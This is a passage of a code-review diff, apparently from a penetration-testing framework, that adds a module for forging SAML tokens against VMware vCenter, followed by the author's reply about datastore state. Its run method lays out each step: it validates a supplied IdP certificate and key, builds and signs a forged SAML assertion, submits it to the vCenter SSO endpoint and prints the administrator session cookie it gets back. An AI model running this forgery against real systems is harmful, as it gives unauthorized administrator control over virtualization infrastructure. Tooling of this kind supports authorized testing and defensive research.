modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb

```diff
@@ -0,0 +1,580 @@
+    datastore['USERNAME']
+  end
+
+  def domain
+    datastore['DOMAIN']
+  end
+
+  def vcenter_fqdn
+    datastore['VC_FQDN']
+  end
+
+  def vc_idp_cert
+    datastore['VC_IDP_CERT']
+  end
+
+  def vc_idp_key
+    datastore['VC_IDP_KEY']
+  end
+
+  def vc_vmca_cert
+    datastore['VC_VMCA_CERT']
+  end
+
+  def saml_ca_cert
+    datastore['VCENTER_SAML_CA_CERT']
+  end
+
+  def saml_idp_cert
+    datastore['VCENTER_SAML_IDP_CERT']
+  end
+
+  def saml_idp_key
+    datastore['VCENTER_SAML_IDP_KEY']
+  end
+
+  def saml_id
+    datastore['VCENTER_SAML_ID']
+  end
+
+  def saml_issue_instant
+    datastore['VCENTER_SAML_ISSUE']
+  end
+
+  def saml_username
+    datastore['VCENTER_SAML_USER']
+  end
+
+  def saml_domain
+    datastore['VCENTER_SAML_DOMAIN']
+  end
+
+  def saml_response_id
+    datastore['VCENTER_SAML_RESPONSE_ID']
+  end
+
+  def saml_assert_id
+    datastore['VCENTER_SAML_ASSERT_ID']
+  end
+
+  def saml_idx_id
+    datastore['VCENTER_SAML_IDX_ID']
+  end
+
+  def saml_not_before
+    datastore['VCENTER_SAML_NOT_BEFORE']
+  end
+
+  def saml_not_after
+    datastore['VCENTER_SAML_NOT_AFTER']
+  end
+
+  def saml_relay_state
+    datastore['VCENTER_SAML_RELAY_STATE']
+  end
+
+  def sso_token
+    datastore['VCENTER_SAML_TOKEN']
+  end
+
+  def sso_path
+    datastore['VCENTER_SAML_PATH']
+  end
+
+  def ssl
+    datastore['SSL']
+  end
+
+  def run
+    unless validate_fqdn(vcenter_fqdn)
+      print_error("Invalid vCenter FQDN provided: #{vcenter_fqdn}")
+      return
+    end
+
+    unless validate_fqdn(domain)
+      print_error("Invalid vCenter SSO domain provided: #{domain}")
+      return
+    end
+
+    unless validate_idp_options
+      print_error('Could not validate the supplied IdP trusted certificate chain')
+      return
+    end
+
+    print_good('Validated vCenter Single Sign-On IdP trusted certificate chain')
+
+    print_status('HTTP GET => /ui/login ...')
+    unless init_vsphere_login
+      print_error("Unable to initiate SAML login with #{rhosts}")
+      return
+    end
+
+    vprint_status('Create forged SAML assertion XML ...')
+    unless (vsphere_saml_response = get_saml_response_template)
+      print_error('Unable to generate SAML response XML')
+      return
+    end
+
+    vprint_status('Sign forged SAML assertion with IdP key ...')
+    unless (vsphere_saml_auth = sign_vcenter_saml(vsphere_saml_response))
+      print_error('Unable to sign SAML assertion')
+      return
+    end
+
+    print_status('HTTP POST => /ui/saml/websso/sso ...')
+    unless (session_cookie = submit_vcenter_auth(vsphere_saml_auth))
+      print_error('Unable to acquire administrator session token')
+      return
+    end
+
+    print_good('Got valid administrator session token!')
+    print_good("\t#{session_cookie}")
+
+    return true
+  end
+
+  def clear_idp_datastore
+    datastore['VCENTER_SAML_IDP_CERT'] = ''
+    datastore['VCENTER_SAML_IDP_KEY'] = ''
+    datastore['VCENTER_SAML_CA_CERT'] = ''
+  end
```

Comment:
You are exactly correct. The reason these exist is because I did not understand the datastore scope, and found values set there persisted between runs. A couple methods like this exist simply to clear their state when needed. Once I've revised this they will not need to exist.